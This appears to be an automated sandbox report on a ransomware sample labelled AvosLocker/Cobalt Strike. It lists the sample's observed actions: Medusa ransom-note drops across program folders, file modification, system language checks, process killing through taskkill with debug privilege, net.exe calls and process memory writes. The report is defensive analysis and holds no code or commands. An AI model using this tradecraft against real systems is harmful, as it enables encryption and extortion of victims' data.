File created C:\Program Files\WindowsApps\Microsoft.WindowsMaps_5.1906.1972.0_x64__8wekyb3d8bbwe\Assets\SecondaryTiles\Collections\contrast-white\!!!READ_ME_MEDUSA!!!.txt C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\HomeStudent2019R_OEM_Perp-ul-oob.xrm-ms C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\MondoR_SubTrial-ppd.xrm-ms C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.VP9VideoExtensions_1.0.22681.0_x64__8wekyb3d8bbwe\Assets\contrast-white\AppList.targetsize-40_contrast-white.png C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe N/A
File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\YahooPromoTile.scale-200.png C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsMaps_5.1906.1972.0_x64__8wekyb3d8bbwe\Assets\SecondaryTiles\Transit\contrast-black\MedTile.scale-200.png C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe N/A
File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\js\nls\da-dk\!!!READ_ME_MEDUSA!!!.txt C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe N/A
File created C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\EQUATION\1033\!!!READ_ME_MEDUSA!!!.txt C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe N/A
File opened for modification C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.WindowsMaps_5.1906.1972.0_neutral_split.scale-125_8wekyb3d8bbwe\Assets\SecondaryTiles\Collections\contrast-black\LargeTile.scale-125_contrast-black.png C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.MixedReality.Portal_2000.19081.1301.0_x64__8wekyb3d8bbwe\IrisProtocol.winmd C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.WebpImageExtension_1.0.22753.0_x64__8wekyb3d8bbwe\Assets\AppList.targetsize-30.png C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe N/A
File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\contrast-black\HxMailWideTile.scale-400.png C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\js\nls\pl-pl\ui-strings.js C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe N/A
File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\js\nls\eu-es\!!!READ_ME_MEDUSA!!!.txt C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe N/A
File opened for modification C:\Program Files (x86)\Common Files\Microsoft Shared\ink\uk-UA\!!!READ_ME_MEDUSA!!!.txt C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\HomeBusinessR_OEM_Perp4-pl.xrm-ms C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe N/A
File created C:\Program Files\WindowsApps\Microsoft.Microsoft3DViewer_6.1908.2042.0_x64__8wekyb3d8bbwe\Common.View.UWP\Strings\!!!READ_ME_MEDUSA!!!.txt C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsCamera_2018.826.98.0_x64__8wekyb3d8bbwe\Assets\Icons\icon_play_nor.png C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe N/A

Browser Information Discovery

discovery

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net1.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net1.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net1.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net1.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net1.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net1.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net1.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net1.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net1.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net1.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net1.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net1.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net1.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net1.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\taskkill.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\taskkill.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\taskkill.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net1.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net1.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net1.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net1.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net1.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net1.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net1.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net1.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net1.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net1.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\taskkill.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\taskkill.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net1.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net1.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net1.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net1.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net1.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net1.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net1.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net.exe N/A

System Network Configuration Discovery: Internet Connection Discovery

discovery
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A

Kills process with taskkill

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-1194130065-3471212556-1656947724-1000\{BCAE019F-76A7-406C-BA78-5CF87BABD458} C:\Windows\explorer.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ C:\Windows\explorer.exe N/A

Runs net.exe

Runs ping.exe

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\explorer.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\explorer.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\explorer.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\explorer.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\explorer.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\explorer.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\explorer.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\explorer.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\explorer.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\explorer.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\explorer.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\explorer.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1856 wrote to memory of 3144 N/A C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe C:\Windows\SysWOW64\net.exe
PID 1856 wrote to memory of 3144 N/A C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe C:\Windows\SysWOW64\net.exe
PID 1856 wrote to memory of 3144 N/A C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe C:\Windows\SysWOW64\net.exe
PID 3144 wrote to memory of 1264 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 3144 wrote to memory of 1264 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 3144 wrote to memory of 1264 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 1856 wrote to memory of 2212 N/A C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe C:\Windows\SysWOW64\net.exe
PID 1856 wrote to memory of 2212 N/A C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe C:\Windows\SysWOW64\net.exe
PID 1856 wrote to memory of 2212 N/A C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe C:\Windows\SysWOW64\net.exe
PID 2212 wrote to memory of 4560 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 2212 wrote to memory of 4560 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 2212 wrote to memory of 4560 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 1856 wrote to memory of 3904 N/A C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe C:\Windows\SysWOW64\net.exe
PID 1856 wrote to memory of 3904 N/A C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe C:\Windows\SysWOW64\net.exe
PID 1856 wrote to memory of 3904 N/A C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe C:\Windows\SysWOW64\net.exe
PID 3904 wrote to memory of 3980 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 3904 wrote to memory of 3980 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 3904 wrote to memory of 3980 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 1856 wrote to memory of 1984 N/A C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe C:\Windows\SysWOW64\net.exe
PID 1856 wrote to memory of 1984 N/A C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe C:\Windows\SysWOW64\net.exe
PID 1856 wrote to memory of 1984 N/A C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe C:\Windows\SysWOW64\net.exe
PID 1984 wrote to memory of 4840 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 1984 wrote to memory of 4840 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 1984 wrote to memory of 4840 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 1856 wrote to memory of 1208 N/A C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe C:\Windows\SysWOW64\net.exe
PID 1856 wrote to memory of 1208 N/A C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe C:\Windows\SysWOW64\net.exe
PID 1856 wrote to memory of 1208 N/A C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe C:\Windows\SysWOW64\net.exe
PID 1208 wrote to memory of 4836 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 1208 wrote to memory of 4836 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 1208 wrote to memory of 4836 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 1856 wrote to memory of 4204 N/A C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe C:\Windows\SysWOW64\net.exe
PID 1856 wrote to memory of 4204 N/A C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe C:\Windows\SysWOW64\net.exe
PID 1856 wrote to memory of 4204 N/A C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe C:\Windows\SysWOW64\net.exe
PID 4204 wrote to memory of 1796 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 4204 wrote to memory of 1796 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 4204 wrote to memory of 1796 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 1856 wrote to memory of 5048 N/A C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe C:\Windows\SysWOW64\net.exe
PID 1856 wrote to memory of 5048 N/A C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe C:\Windows\SysWOW64\net.exe
PID 1856 wrote to memory of 5048 N/A C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe C:\Windows\SysWOW64\net.exe
PID 5048 wrote to memory of 5024 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 5048 wrote to memory of 5024 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 5048 wrote to memory of 5024 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 1856 wrote to memory of 3996 N/A C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe C:\Windows\SysWOW64\net.exe
PID 1856 wrote to memory of 3996 N/A C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe C:\Windows\SysWOW64\net.exe
PID 1856 wrote to memory of 3996 N/A C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe C:\Windows\SysWOW64\net.exe
